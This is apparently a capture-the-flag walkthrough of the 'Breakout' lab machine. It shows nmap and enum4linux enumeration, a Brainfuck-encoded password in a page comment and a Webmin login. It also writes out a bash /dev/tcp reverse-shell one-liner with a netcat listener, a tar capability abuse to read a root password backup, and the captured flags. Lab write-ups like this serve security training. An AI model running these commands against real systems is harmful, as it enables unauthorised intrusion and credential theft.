Breakout

Difficulty: Easy

Enumeration

nmap

We start with an nmap scan using the following command line. It probes all TCP ports, reports only open ones, runs the default detection scripts, and attempts to identify the services and their versions.

sudo nmap -p- -sC -sV --min-rate 5000 --open -vvv -n -Pn 192.168.1.46
PORT      STATE SERVICE     REASON         VERSION
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.51 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
10000/tcp open  http        syn-ack ttl 64 MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-favicon: Unknown favicon MD5: 75C5BD2E2D20D547F33BCB04ADB20CD0
|_http-title: 200 — Document follows
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
20000/tcp open  http        syn-ack ttl 64 MiniServ 1.830 (Webmin httpd)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 79B65889866572A8F43F8DDE9150D647
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.830

Host script results:
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BREAKOUT<00>         Flags: <unique><active>
|   BREAKOUT<03>         Flags: <unique><active>
|   BREAKOUT<20>         Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time: 
|   date: 2023-11-12T14:26:36
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 31772/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52058/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 53448/udp): CLEAN (Failed to receive data)
|   Check 4 (port 56426/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

whatweb

We then use whatweb to identify the technologies and platforms behind the web site.

View Page Source

Opening the site in a web browser confirms that Apache2 is running and serving its default page.

Let's check the source code and find a pleasant surprise.

Hidden in an HTML comment of the page source is a program written in Brainfuck, a minimalist programming language designed around an extremely small instruction set.

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->

Running this program through an online Brainfuck interpreter yields the following string:

.2uqPEfj3D<P'a-3

enum4linux

With enum4linux we collect information about users and shared resources on the host.

enum4linux -a 192.168.1.46

We have found a local user.

Exploitation

Now that we have a possible credential pair, we try it against the MiniServ (Webmin) login on port 20000.

User: cyber => Pass: .2uqPEfj3D<P'a-3

The login succeeds. After navigating through the different sections, we reach the Command Shell module and confirm that it executes the commands we enter.

We follow the usual procedure to obtain a reverse shell with netcat: a listener on our machine and a bash redirection run from the target.

nc -lvnp 9001
bash -i >& /dev/tcp/192.168.1.117/9001 0<&1

We find the file user.txt and read it with cat.

To look for escalation paths we run getcap -r / 2>/dev/null, which recursively lists the Linux file capabilities set on executables across the filesystem.

getcap -r / 2>/dev/null

The cap_dac_read_search=ep capability on the tar binary in /home/cyber means that this copy of tar bypasses discretionary access checks for reading files and searching directories, so it can read content that the cyber user has no standard read permission for.

Privilege Escalation

Doing a little enumeration on the machine, we find a .old_pass.bak file in /var/backups, but we don’t have the permissions required to view its contents.

The following command uses the capability-enabled tar binary to create an archive named pass.tar containing /var/backups/.old_pass.bak, which is exactly the read-permission bypass that cap_dac_read_search grants.

./tar -cvf pass.tar /var/backups/.old_pass.bak

We extract the archive with the following command; the recovered password gives us root.

tar xvf pass.tar

Flags

user.txt

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

root.txt

Ts&4&YurgtRX(=~h

With this we have successfully completed this machine.
